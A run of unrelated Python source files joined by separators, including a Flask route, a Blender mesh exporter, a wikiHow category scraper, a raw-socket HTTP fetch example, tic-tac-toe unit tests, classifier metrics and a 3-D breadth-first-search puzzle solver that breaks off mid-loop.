    auth_result = auth_user()
    if not auth_result[0]:
        return redirect(auth_result[1])
    userinfo = auth_result[1]
    domain_id = request.args.get('domain_id', '')
    # Reject a missing/non-numeric id up front: the original passed the
    # default empty string to int(), raising ValueError (an HTTP 500).
    if not domain_id.isdigit() or not Domain.test_if_domain_id_exists(int(domain_id)):
        return redirect("/manage/domain_list")
    user_domain_list = get_domain_list_by_user_id(userinfo['user_id'])
    # domain_id stays a string here, matching the original call signatures.
    domain_info = Domain.get_domain_by_domain_id(domain_id)
    if if_user_id_have_domain_rights(userinfo['user_id'], domain_id):
        return render_template("manage_domain_have_rights.html", userinfo=userinfo, user_domain_list=user_domain_list, domain_info=domain_info)
    return render_template("manage_domain_no_rights.html", userinfo=userinfo, user_domain_list=user_domain_list, domain_info=domain_info)
|
import parser
import json
def get_new_in_radius(radius):
    """Return listings within `radius` not seen before; update the cache file."""
    listings = parser.results_in_radius(radius)
    with open("cache/checked.json", "r") as fh:
        seen_ids = json.load(fh)
    fresh = []
    for listing in listings:
        pub_id = listing["PublicatieId"]
        if pub_id not in seen_ids:
            fresh.append(listing)
            seen_ids.append(pub_id)
    with open("cache/checked.json", "w") as fh:
        json.dump(seen_ids, fh)
    return fresh
|
'''
Selfedu001133PyBegin_v11_list_TASKmy04_20200621.py

Print two asterisk triangles side by side: one growing row by row,
one shrinking (the hint: replace the dots with element counts).
'''
total = int(input("Количество элементов списка: "))
bars = [row * '*' for row in range(total)]
print("задано количество элементов: ", total)
for row in range(total - 1):
    print(bars[row + 1], bars[total - 1 - row])
|
import os, sys
import json
import configparser
import bpy, bpy_types
import bmesh
import struct
# TODO:
# - Apply modifiers before export
# - Export list of assets and textures (and code to preload)
# e.g. /Applications/Blender/blender.app/Contents/MacOS/blender -b srcart/forest.blend -P script/export_scene.py -- ld33_export.cfg
def texturesForObject( obj ):
    """Collect the image file paths of all textures attached to `obj`."""
    paths = []
    for mat_slot in obj.material_slots:
        for tex_slot in mat_slot.material.texture_slots:
            # Empty slots are None; only texture types with an image count.
            if tex_slot and hasattr(tex_slot.texture, 'image'):
                paths.append(tex_slot.texture.image.filepath)
    print(paths)
    return paths
def exportMeshObj( mesh, meshExportName ):
    """Triangulate `mesh` in place and write it to `meshExportName` as a
    packed binary: a 'MESH' header plus one 10-float vertex record
    (pos, normal, uv + 2 padding floats) per triangle corner.

    NOTE(review): triangulation mutates the caller's mesh datablock.
    """
    #DBG
    #if (meshExportName.find('TreeOakMesh')==-1):
    #    return
    # Triangulate the mesh
    bm = bmesh.new()
    bm.from_mesh(mesh)
    bmesh.ops.triangulate( bm, faces=bm.faces )
    bm.to_mesh(mesh)
    bm.free()
    # This could be better..
    # HEADER:
    # 'MESH' 4cc (byte[4])
    # num_triangles uint32_t
    header = struct.pack( '<4sL', str.encode("MESH"), len(mesh.polygons) )
    packedDataList = [ header ]
    uv_layer = mesh.uv_layers['UVMap'].data[:]
    # print(uv_layer)
    # print ("NUM UV", len(uv_layer))
    # print ("NUM VERT", len(mesh.vertices))
    # stndx walks the per-loop UV data in lockstep with the face corners.
    stndx = 0;
    for face in mesh.polygons:
        verts = face.vertices[:]
        # for now, only triangles
        assert(len(verts)==3)
        packedTri = []
        for vndx in verts:
            v = mesh.vertices[vndx]
            uv = uv_layer[stndx]
            stndx += 1
            #print(v.co, v.normal, uv.uv )
            # pack up the vert data; note Y/Z are swapped for the engine's
            # coordinate system and V is flipped (1.0 - v).
            packedVert = struct.pack( '<3f3f4f',
                v.co[0], v.co[2], v.co[1],
                v.normal[0], v.normal[2], v.normal[1],
                uv.uv[0], 1.0-uv.uv[1], 0.0, 0.0 );
            packedTri.append(packedVert)
        # Reversed corner order flips the triangle winding for the engine.
        packedTri.reverse()
        packedDataList += packedTri
    # Write the mesh data
    packedData = b''.join( packedDataList )
    print ("----", meshExportName, len(packedData), len(mesh.polygons) )
    with open( meshExportName, 'bw') as fp:
        fp.write( packedData )
def getConfig():
    """Parse the script arguments after blender's '--' separator and load
    the export config file they name.

    Returns a ConfigParser, or None when no config path was given.
    """
    # Extract the script arguments
    argv = sys.argv
    try:
        index = argv.index("--") + 1
    except ValueError:  # no '--' separator: no script arguments at all
        # (original used a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit)
        index = len(argv)
    argv = argv[index:]
    print ("Argv is ", argv)
    # read the export config
    cfg = configparser.ConfigParser()
    if (len(argv)==0):
        return None
    cfg.read(argv[0])
    return cfg
def exportScene( cfg, sceneName ):
    """Export all layer-0 mesh datablocks to cfg's MeshPath, then write a
    scene JSON (object name/loc/rot/scale/mesh/texture) to ScenePath.

    NOTE(review): loc and scl swap Y and Z for the target engine;
    rot is left in Blender's axis order — confirm that asymmetry is intended.
    """
    # Deduplicate mesh datablocks shared by several objects.
    meshes = {}
    for obj in bpy.data.objects:
        if type(obj.data) == bpy_types.Mesh and not obj.data.name in meshes:
            # Only export objects on layer 0
            if not obj.layers[0]:
                continue
            meshes[obj.data.name] = obj.data
    print ("Exporting Meshes...")
    meshPath = cfg['Paths']['MeshPath']
    for name, mesh in meshes.items():
        meshExportName = os.path.join( meshPath, "MESH_" + name + ".dat" )
        exportMeshObj( mesh, meshExportName )
    print ("Exporting Scene...")
    scenePath = cfg['Paths']['ScenePath']
    sceneObjs = []
    for obj in bpy.data.objects:
        # Only export objects on layer 0
        if not obj.layers[0]:
            continue
        if type(obj.data) != bpy_types.Mesh:
            continue
        sceneObj = { "name" : obj.name,
            "loc" : (obj.location.x, obj.location.z, obj.location.y),
            "rot" : tuple(obj.rotation_euler),
            "scl" : (obj.scale.x, obj.scale.z, obj.scale.y ),
            "mesh" : "MESH_" + obj.data.name }
        textures = texturesForObject( obj )
        print (obj.name, textures )
        if (len(textures) > 1):
            print ("WARNING: Object ", obj.name, " has multiple textures")
        if (len(textures)==0):
            print("WARNING: Object ", obj.name, " missing texture" );
            textures = [ 'missing.png']
        # Only the first texture's basename is recorded.
        sceneObj['texture'] = os.path.split(textures[0])[-1]
        sceneObjs.append( sceneObj )
    # locStr = "%f,%f,%f" % tuple(obj.location)
    # rotStr = "%f,%f,%f" % tuple(obj.rotation_euler)
    # if type(obj.data) == bpy_types.Mesh:
    # print ("MESH: ", obj.name, obj.data.name, locStr, rotStr )
    sceneFile = os.path.join( scenePath, sceneName + ".json")
    print (sceneFile)
    with open(sceneFile, 'w') as fp:
        json.dump( sceneObjs, fp, sort_keys=True, indent=4, separators=(',', ': '))
def main():
    """Entry point: derive the scene name from blender's -b argument,
    load the export config, and run the export."""
    print ("LD exporter...")
    # Scan blender's own args (everything before '--') for the .blend file
    # that follows -b; its basename (sans extension) names the scene.
    sceneName = None
    for a in range(len(sys.argv)):
        if (sys.argv[a]=='--'):
            break
        if (sys.argv[a]=='-b'):
            sceneName = os.path.splitext(os.path.basename(sys.argv[a+1]))[0]
    if sceneName is None:
        # The original fell through to a NameError here when -b was absent.
        print ("ERROR: No -b <scene.blend> argument, export stopped")
        return
    cfg = getConfig()
    if cfg is None:
        print ("ERROR: Missing config, export stopped")
        return
    exportScene(cfg, sceneName )
if __name__=='__main__':
    main()
|
import json
# Category tree scraped previously; each node has "name" and optional "children".
with open('know-how.json', 'r') as f:
    data = json.load(f)
#Get the questions
import requests
# from lxml import html
counter = 0
import re
# Captures article slugs out of wikihow hrefs, e.g. //www.wikihow.com/<Slug>
regex = '(?<=href=\"\/\/www\.wikihow\.com\/)[A-Za-z\-]*(?=\")'
def scrape(data):
    """Recursively attach a 'list' of article slugs to each category node."""
    category = data["name"]
    print(category)
    try:
        response = requests.get("https://www.wikihow.com/Category:" + category)
        data["list"] = re.findall(regex, response.text)
    except Exception as e:
        # Best-effort: log the failure and keep walking the tree.
        print(e)
        print(category)
    if "children" in data:
        for child in data["children"]:
            scrape(child)
# Crawl every category, then persist the augmented tree.
scrape(data)
with open('ques_list.json', 'w') as f:
    json.dump(data, f, indent=4, sort_keys=False)
# for j in tuplist:
# page = requests.get("https://www.wikihow.com/Category:" + )
# tree = html.fromstring(page.content)
# href = tree.xpath('//div[contains(@class, "section minor_section")]/ul/li/a/@href')
# title = tree.xpath('//div[contains(@class, "section minor_section")]/ul/li/a/text()')
# print(title)
# for i in range(len(href)):
# counter = counter + 1
# queslist.append((href[i], title[i]))
# print(j[1], counter)
# with open("wikihow_question_nos.txt", "a") as f:
# for i in range(len(queslist)):
# f.write(str(i) + '\t' + queslist[i][1] + '\n') |
import socket

# Minimal raw-HTTP client: fetch a small text file over port 80.
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(('data.pr4e.org', 80))
# encode(): unicode -> UTF-8 bytes for the wire
request = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\r\n\r\n'.encode()
conn.send(request)
while True:
    chunk = conn.recv(512)
    if len(chunk) < 1:
        break
    # decode(): UTF-8 bytes back to unicode text
    print(chunk.decode())
conn.close()
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: adds/removes OpinsysAuthProvider.school."""

    def forwards(self, orm):
        """Apply: add the 'school' CharField (default '', max_length 200)."""
        # Adding field 'OpinsysAuthProvider.school'
        db.add_column('opinsys_opinsysauthprovider', 'school', self.gf('django.db.models.fields.CharField')(default='', max_length=200), keep_default=False)

    def backwards(self, orm):
        """Revert: drop the 'school' column again."""
        # Deleting field 'OpinsysAuthProvider.school'
        db.delete_column('opinsys_opinsysauthprovider', 'school')

    # Frozen ORM snapshot used by South; generated — do not edit by hand.
    models = {
        'dreamuserdb.authprovider': {
            'Meta': {'object_name': 'AuthProvider'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'organisation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['dreamuserdb.Organisation']"})
        },
        'dreamuserdb.organisation': {
            'Meta': {'object_name': 'Organisation'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        'opinsys.opinsysauthprovider': {
            'Meta': {'object_name': 'OpinsysAuthProvider', '_ormbases': ['dreamuserdb.AuthProvider']},
            'authprovider_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['dreamuserdb.AuthProvider']", 'unique': 'True', 'primary_key': 'True'}),
            'dc': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'school': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'user': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        }
    }
    complete_apps = ['opinsys']
|
import unittest
from game import Game
from players import AIPlayer
class TestWinningStateDetection(unittest.TestCase):
    """Exercises Game.is_winning_board / Game.winner_symbol for rows,
    columns, diagonals and non-winning boards.

    NOTE(review): some fixtures mix lowercase "x" with uppercase "X" —
    presumably distinct (non-winning) marks; confirm that is intentional.
    """
    def test_top_row_is_winning(self):
        game_board = Game()
        game_board.board = [
            "X", "X", "X",
            "O", "O", None,
            None,None,None
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "X"
    def test_top_left_diagonal_row_is_winning(self):
        game_board = Game()
        game_board.board = [
            "O", "X", "X",
            "O", "O", "x",
            None,"x","O"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "O"
    def test_right_column_is_winning(self):
        game_board = Game()
        game_board.board = [
            "O", "O", "X",
            "O", "O", "X",
            None,"x","X"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "X"
    def test_no_winning_state_1(self):
        game_board = Game()
        game_board.board = [
            "O", "O", "X",
            "O", None, "X",
            None,"x",None
        ]
        is_win = game_board.is_winning_board
        self.assertFalse(is_win)
        assert game_board.winner_symbol == None
    def test_no_winning_state_2(self):
        game_board = Game()
        game_board.board = [
            "O", "O", "X",
            "O", "O", "X",
            None,"x",None
        ]
        is_win = game_board.is_winning_board
        self.assertFalse(is_win)
        assert game_board.winner_symbol == None
class TestEndGameStateDetection(unittest.TestCase):
    """Exercises Game.is_game_ended alongside is_winning_board: draws,
    full-board wins, early wins, and in-progress boards."""
    def test_no_more_moves_game_ended_draw(self):
        game_board = Game()
        game_board.board = [
            "X", "O", "X",
            "O", "X", "X",
            "O", "X", "O"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(game_board.is_game_ended)
        self.assertFalse(is_win)
        assert game_board.winner_symbol == None
    def test_no_more_moves_game_ended_win(self):
        game_board = Game()
        game_board.board = [
            "X", "O", "O",
            "O", "X", "X",
            "O", "X", "X"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(game_board.is_game_ended)
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "X"
    def test_quick_winning_state_game_ended(self):
        game_board = Game()
        game_board.board = [
            "X", "O", None,
            "O", "X", None,
            None,None,"X"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(game_board.is_game_ended)
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "X"
    def test_long_game_winning_game_ended(self):
        game_board = Game()
        game_board.board = [
            "X", "O", None,
            "O", "X","X",
            "O", "O","X"
        ]
        is_win = game_board.is_winning_board
        self.assertTrue(game_board.is_game_ended)
        self.assertTrue(is_win)
        assert game_board.winner_symbol == "X"
    def test_short_game_not_ended(self):
        game_board = Game()
        game_board.board = [
            "X", "O", None,
            None, None,None,
            "O", None,"X"
        ]
        is_win = game_board.is_winning_board
        self.assertFalse(game_board.is_game_ended)
        self.assertFalse(is_win)
        assert game_board.winner_symbol == None
    def test_long_game_not_ended(self):
        game_board = Game()
        game_board.board = [
            "X", "O", "X",
            None, None,"O",
            "O", "X","X"
        ]
        is_win = game_board.is_winning_board
        self.assertFalse(game_board.is_game_ended)
        self.assertFalse(is_win)
        assert game_board.winner_symbol == None
class TestAIPlayer(unittest.TestCase):
    """Scenario tests for AIPlayer board scoring and move selection.

    Each fixture pairs a board with the per-cell scores the AI is expected
    to produce (None for occupied cells) and the resulting best-move list.
    player_args is (own_symbol, opponent_symbol).

    NOTE(review): fixture 12 contains an uppercase "X" among lowercase
    marks — presumably a typo in the fixture; confirm against AIPlayer.
    """
    def setUp(self):
        self.board_and_results = [
            # 0
            {
                "board_to_score": [
                    "x", "o", "x",
                    None, "o", "o",
                    "x", None, "x"
                ],
                "expected_score": [
                    None, None, None,
                    15, None, None,
                    None, 15, None,
                ],
                "expected_moves": [3,7],
                "player_args": ("o", "x")
            },
            # 1
            {
                "board_to_score": [
                    "x", "o", "x",
                    None, "o", "o",
                    None,"x", "x"
                ],
                "expected_score": [
                    None, None, None,
                    8, None, None,
                    12, None, None,
                ],
                "expected_moves": [6],
                "player_args": ("x", "o")
            },
            # 2
            {
                "board_to_score": [
                    "x", "o", "x",
                    None, "o", "o",
                    None, None, "x"
                ],
                "expected_score": [
                    None, None, None,
                    8, None, None,
                    5, 8, None,
                ],
                "expected_moves": [3,7],
                "player_args": ("x", "o")
            },
            # 3 DUPE?
            {
                "board_to_score": [
                    "x", "o", "x",
                    None, "o", None,
                    None, None, "x"
                ],
                "expected_score": [
                    None, None, None,
                    4, None, 8,
                    5, 11, None,
                ],
                "expected_moves": [7],
                "player_args": ("o", "x")
            },
            # 4
            {
                "board_to_score": [
                    None, None, None,
                    None, "x", None,
                    None, None, "o"
                ],
                "expected_score": [
                    3, 6, 5,
                    6, None, 7,
                    5, 7, None,
                ],
                "expected_moves": [5,7],
                "player_args": ("o", "x")
            },
            # 5
            {
                "board_to_score": [
                    None, "x", None,
                    None, "o", None,
                    None, None, None
                ],
                "expected_score": [
                    5, None, 5,
                    6, None, 6,
                    4, 5, 4,
                ],
                "expected_moves": [3,5],
                "player_args": ("o", "x")
            },
            # 6
            {
                "board_to_score": [
                    None, None, None,
                    None, None, None,
                    None, None, None
                ],
                "expected_score": [
                    3, 2, 3,
                    2, 7, 2,
                    3, 2, 3,
                ],
                "expected_moves": [4],
                "player_args": ("o", "x")
            },
            # 7
            {
                "board_to_score": [
                    "x", "o", "o",
                    "o", "x", "x",
                    "x", "x", "o"
                ],
                "expected_score": [
                    None, None, None,
                    None, None, None,
                    None, None, None,
                ],
                "expected_moves": [],
                "player_args": ("o", "x")
            },
            # 8
            {
                "board_to_score": [
                    "x", None, "x",
                    "o", "o", None,
                    None, None, "x"
                ],
                "expected_score": [
                    None, 8, None,
                    None, None, 15,
                    4, 4, None,
                ],
                "expected_moves": [5],
                "player_args": ("o", "x")
            },
            # 9
            {
                "board_to_score": [
                    "x", None, "x",
                    None, "o", None,
                    None, None, None
                ],
                "expected_score": [
                    None, 11, None,
                    7, None, 7,
                    4, 6, 4,
                ],
                "expected_moves": [1],
                "player_args": ("o", "x")
            },
            # 10
            {
                "board_to_score": [
                    "o", "x", None,
                    None, "x", None,
                    None, None, None
                ],
                "expected_score": [
                    None, None, 4,
                    7, None, 6,
                    5, 10, 3,
                ],
                "expected_moves": [7],
                "player_args": ("o", "x")
            },
            # 11
            {
                "board_to_score": [
                    "x", None, None,
                    None, "o", None,
                    None, None, "x"
                ],
                "expected_score": [
                    None, 7, 6,
                    7, None, 7,
                    6, 7, None,
                ],
                "expected_moves": [1,3,5,7],
                "player_args": ("o", "x")
            },
            # 12 sure win for "o"
            {
                "board_to_score": [
                    "x", "o", "x",
                    "X", "o", "o",
                    None, None, "x"
                ],
                "expected_score": [
                    None, None, None,
                    None, None, None,
                    4, 11, None,
                ],
                "expected_moves": [7],
                "player_args": ("o", "x")
            },
            # 13 I was able to win this scenrio
            {
                "board_to_score": [
                    None, None, "x",
                    None, "o", "x",
                    None, None, None
                ],
                "expected_score": [
                    5, 7, None,
                    5, None, None,
                    3, 6, 9,
                ],
                "expected_moves": [8],
                "player_args": ("o", "x")
            },
            # 14 I was able to win this scenrio
            {
                "board_to_score": [
                    None, "o", None,
                    None, "x", "x",
                    None, "o", "o"
                ],
                "expected_score": [
                    4, None, 5,
                    10, None, None,
                    9, None, None,
                ],
                "expected_moves": [3],
                "player_args": ("x", "o")
            },
        ]
    def test_potentialboard_states(self):
        """
        Make sure AI behaves as expected for some scenario
        """
        for i, boards in enumerate(self.board_and_results):
            # NOTE(review): Python 2 print statement — this module is
            # py2-only as written.
            print "Scoring board: ", i
            board_to_score = boards['board_to_score']
            expected_score = boards['expected_score']
            expected_moves = boards['expected_moves']
            player_args = boards['player_args']
            ai_player = AIPlayer( *player_args)
            board = ai_player.score_current_board(board_to_score)
            self.assertEqual(
                board,
                expected_score
            )
            self.assertEqual(
                ai_player.get_potential_moves(board_to_score),
                expected_moves
            )
# Run the whole suite when executed directly.
if __name__ == '__main__':
    unittest.main()
from metric.metric_abstract import AbstractClassifierMetric
import numpy as np
# class MyEvaluator(AbstractEvaluation):
# def evaluate_dataset(self,dataset,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset.set_window,plabel)
# a_events = convertAndMergeToEvent(dataset.set_window,dataset.label)
# return self.qualitymeasurement(pa_events,a_events)
# def confusion_matrix_dataset(self, dataset,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset.set_window,plabel)
# a_events =dataset.a_events # convertAndMergeToEvent(dataset.set_window,dataset.label)
# print(a_events)
# cm=myaccuracy(pa_events,a_events)
# return cm
# def evaluate(self,time_window, rlabel,plabel,pprob):
# pa_events = convertAndMergeToEvent(time_window,plabel)
# a_events = convertAndMergeToEvent(time_window,rlabel)
# return self.qualitymeasurement(pa_events,dataset.a_events)
# def confusion_matrix(self, time_window, rlabel,plabel,pprob):
# pa_events = convertAndMergeToEvent(dataset,plabel)
# a_events = convertAndMergeToEvent(time_window,rlabel)
# cm=myaccuracy(pa_events,a_events)
# return cm
# def qualitymeasurement(self,p_events,r_events):
# cm=myaccuracy(p_events,r_events)
# s=np.array(cm).sum().sum()
# correct=0
# for i in range(0,len(cm)):
# correct+=cm[i,i]
# return correct/s
class ClassicalMetric(AbstractClassifierMetric):
    """Base for confusion-matrix-derived classifier metrics."""
    # def evaluate_dataset(self,dataset,plabel,pprob):
    # return self.evaluate(dataset.set,dataset.label,plabel,pprob,dataset.acts)
    # def confusion_matrix_dataset(self, dataset,plabel,pprob):
    # return self.confusion_matrix(dataset.set,dataset.label,plabel,pprob,dataset.acts)
    # def evaluate(self, rset, rlabel,plabel,pprob,labels):
    # ;
    # def confusion_matrix(self, rset, rlabel,plabel,pprob,labels):
    # cm=confusion_matrix(rlabel,plabel,labels)
    # return cm
    def get_tp_fp_fn_tn(self, cm):
        """Split a square confusion matrix into per-class TP/FP/FN/TN.

        Returns (TP, FP, FN) as numpy arrays and TN as a plain list.
        """
        cm = np.array(cm)
        # NOTE(review): np.seterr changes numpy error handling process-wide,
        # not just for this call — confirm that side effect is acceptable.
        np.seterr(divide='ignore', invalid='ignore')
        TP = np.diag(cm)
        FP = np.sum(cm, axis=0) - TP
        FN = np.sum(cm, axis=1).T - TP  # .T is a no-op on the 1-D row sums
        num_classes = len(cm)
        TN = []
        for i in range(num_classes):
            temp = np.delete(cm, i, 0) # delete ith row
            temp = np.delete(temp, i, 1) # delete ith column
            TN.append(temp.sum())
        return TP, FP, FN, TN
    def eval_cm(self, cm, average=None):
        """Subclass hook: compute the metric from a confusion matrix."""
        pass
    # def event_cofusion_matrix(self, p_activity,r_activity):
    # ;
class Accuracy(ClassicalMetric):
    """Overall accuracy, from label arrays or from a confusion matrix."""

    def evaluate(self, rset, rlabel, plabel, pprob, labels):
        """Fraction of predictions equal to the reference labels.

        NOTE(review): `sklearn` is referenced but never imported in this
        module — calling this raises NameError until the import is added.
        """
        return sklearn.metrics.accuracy_score(rlabel, plabel)

    def eval_cm(self, cm, average=None):
        """Accuracy from a confusion matrix: trace / total count."""
        # The original called cm.sum() on the raw argument, which fails for
        # a plain nested list; normalize to an ndarray first.
        cm = np.asarray(cm)
        TP, FP, FN, TN = self.get_tp_fp_fn_tn(cm)
        a = TP.sum()/cm.sum()
        if (average is None):
            # NOTE(review): mirrors the original — accuracy has no
            # per-class form, so the unaveraged request yields None.
            return None
        return a
class Precision(ClassicalMetric):
    """Precision metric: TP / (TP + FP)."""

    def evaluate(self, rset, rlabel, plabel, pprob, labels):
        """Macro precision over the given labels (via sklearn)."""
        precision, _, _, _ = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
        return precision

    def eval_cm(self, cm, average=None):
        """Per-class precision from a confusion matrix, or its NaN-free mean."""
        TP, FP, _, _ = self.get_tp_fp_fn_tn(cm)
        per_class = TP/(TP+FP)
        if average is not None:
            return np.average(per_class[~np.isnan(per_class)])
        return per_class
class Recall(ClassicalMetric):
    """Recall metric: TP / (TP + FN)."""

    def evaluate(self, rset, rlabel, plabel, pprob, labels):
        """Macro recall over the given labels (via sklearn)."""
        _, recall, _, _ = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
        return recall

    def eval_cm(self, cm, average=None):
        """Per-class recall from a confusion matrix, or its NaN-free mean."""
        TP, _, FN, _ = self.get_tp_fp_fn_tn(cm)
        per_class = TP/(TP+FN)
        if average is not None:
            return np.average(per_class[~np.isnan(per_class)])
        return per_class
class F1Evaluator(ClassicalMetric):
    """F1 metric: harmonic mean of precision and recall."""

    def evaluate(self, rset, rlabel, plabel, pprob, labels):
        """Macro F1 over the given labels (via sklearn)."""
        _, _, f1, _ = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average='macro')
        return f1

    def eval_cm(self, cm, average=None):
        """Per-class F1 from a confusion matrix, or its NaN-free mean."""
        TP, FP, FN, _ = self.get_tp_fp_fn_tn(np.array(cm))
        precision = TP/(TP+FP)
        recall = TP/(TP+FN)
        f1 = 2*recall*precision/(recall+precision)
        if average is not None:
            return np.average(f1[~np.isnan(f1)])
        return f1
class All(ClassicalMetric):
    """Combined metric: precision, recall and F1 in one call."""
    def evaluate(self, rset, rlabel, plabel, pprob, labels, average='macro'):
        """Return {'precision', 'recall', 'f1'} computed via sklearn."""
        p, r, f, s = sklearn.metrics.precision_recall_fscore_support(rlabel, plabel, 1, labels, average=average)
        return {'precision': p, 'recall': r, 'f1': f}
    def eval_cm(self, cm, average=None):
        """Compute F1 from a confusion matrix.

        NOTE(review): despite the class name, this returns only F1 — it is
        byte-for-byte the F1Evaluator implementation (likely a copy-paste);
        confirm whether a dict like evaluate() was intended.
        """
        TP, FP, FN, TN = self.get_tp_fp_fn_tn(np.array(cm))
        # print(np.array(TP).shape,np.array(FP).shape,np.array(FN).shape,np.array(TN).shape)
        # print(TP,FP,FN,TN)
        p = TP/(TP+FP)
        r = TP/(TP+FN)
        f = 2*r*p/(r+p)
        if (average is None):
            return f
        return np.average(f[~np.isnan(f)])
# def myaccuracy(predicted0,real0):
# begin=real0.StartTime.min()
# end=real0.EndTime.max()
# predicted=[p for i,p in predicted0.iterrows()]
# real=[p for i,p in real0.iterrows()]
# # predicted.append({'StartTime':begin,'EndTime':end,'Activity':0})
# # real.append({'StartTime':begin,'EndTime':end,'Activity':0})
# events=merge_split_overlap_IntervalTree(real,predicted)
# #predictedtree=makeIntervalTree(labels)
# cm=np.zeros((len(activities),len(activities)))
# for eobj in events:
# e=eobj.data
# pact=e.P.Activity if not(e.P is None) else 0
# ract=e.R.Activity if not(e.R is None) else 0
# cm[pact][ract]+=max((eobj.end-eobj.begin)/pd.to_timedelta('60s').value,0.01);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return cm
# #test_a_events_arr=[x for i,x in test_a_events.iterrows() ]
# #matrix=myaccuracy(test_a_events_arr,testactp)
# #pd.DataFrame(matrix)
# #plot_confusion_matrix(matrix,activities)
# #ev=prepareEval(runs)
# # print(ev[0]['cm'])
# # np.set_printoptions(precision=0)
# # np.set_printoptions(suppress=True)
# # print(np.array(ev[0]['mycm']))
# def myaccuracy2(predicted0,real0):
# predicted=[p for i,p in predicted0.iterrows()]
# real=[p for i,p in real0.iterrows()]
# realtree=makeIntervalTree(real)
# #predictedtree=makeIntervalTree(predicted)
# predictedtree=makeNonOverlapIntervalTree(predicted)
# #predictedtree=makeIntervalTree(labels)
# timeconfusion_matrix=np.zeros((len(activities),len(activities)))
# for p in real:
# for q in predictedtree[p['StartTime'].value:p['EndTime'].value]:
# timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return timeconfusion_matrix
# #test_a_events_arr=[x for i,x in test_a_events.iterrows() ]
# #matrix=myaccuracy(test_a_events_arr,testactp)
# #pd.DataFrame(matrix)
# #plot_confusion_matrix(matrix,activities)
# def event_confusion_matrix(r_activities,p_activities,labels):
# cm=np.zeros((len(labels),len(labels)))
# # begin=real0.StartTime.min()
# # end=real0.EndTime.max()
# predicted=[p for i,p in p_activities.iterrows()]
# real=[p for i,p in r_activities.iterrows()]
# # predicted.append({'StartTime':begin,'EndTime':end,'Activity':0})
# # real.append({'StartTime':begin,'EndTime':end,'Activity':0})
# events=merge_split_overlap_IntervalTree(real,predicted)
# #predictedtree=makeIntervalTree(labels)
# cm=np.zeros((len(activities),len(activities)))
# for eobj in events:
# e=eobj.data
# pact=e.P.Activity if not(e.P is None) else 0
# ract=e.R.Activity if not(e.R is None) else 0
# cm[ract][pact]+=max((eobj.end-eobj.begin)/pd.to_timedelta('60s').value,0.01);
# #for p in predicted:
# # for q in realtree[p['StartTime'].value:p['EndTime'].value]:
# # timeconfusion_matrix[p['Activity']][q.data['Activity']]+=findOverlap(p,q.data);
# return cm
# def merge_split_overlap_IntervalTree(r_acts,p_acts):
# tree=IntervalTree()
# for act in p_acts:
# start=act['StartTime'].value;
# end=act['EndTime'].value;
# if(start==end):
# start=start-1
# #tree[start:end]={'P':{'Activitiy':act.Activity,'Type':'P','Data':act}]
# d=Data('P-act')
# d.P=act
# d.R=None
# tree[start:end]=d #{'P':act,'PActivitiy':act.Activity}
# for act in r_acts:
# start=act['StartTime'].value;
# end=act['EndTime'].value;
# if(start==end):
# start=start-1
# #tree[start:end]=[{'Activitiy':act.Activity,'Type':'R','Data':act}]
# d=Data('P-act')
# d.P=None
# d.R=act
# tree[start:end]=d #{'R':act,'RActivitiy':act.Activity}
# tree.split_overlaps()
# def data_reducer(x,y):
# res=x
# if not(y.P is None):
# if (res.P is None) or y.P['EndTime']<res.P['EndTime']:
# res.P=y.P
# if not(y.R is None):
# if (res.R is None) or y.R['EndTime']<res.R['EndTime']:
# res.R=y.R
# return res
# tree.merge_equals(data_reducer=data_reducer)
# return tree
|
import collections
import sys

# 3-D tomato-ripening problem (multi-source BFS over a 6-connected grid).
# Input: N (columns), M (rows), H (layers), then H*M rows of N values where
# 1 = ripe, 0 = unripe, -1 = empty cell.
# Output: days until everything is ripe, or -1 if some tomato never ripens.
# (Removed: unused check_num/swap/ss and sys.setrecursionlimit — the search
# is iterative, so no recursion depth is ever needed.)
N, M, H = map(int, sys.stdin.readline().split())
box = [[] for _ in range(H)]
for z in range(H):
    for _ in range(M):
        box[z].append(list(map(int, sys.stdin.readline().split())))

# Seed the queue with every initially ripe tomato.
queue = collections.deque(
    (z, i, j)
    for z in range(H)
    for i in range(M)
    for j in range(N)
    if box[z][i][j] == 1
)

# 6-connected neighbours: adjacent layer, row, or column.
DELTAS = ((1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1))

result_day = 0
while queue:
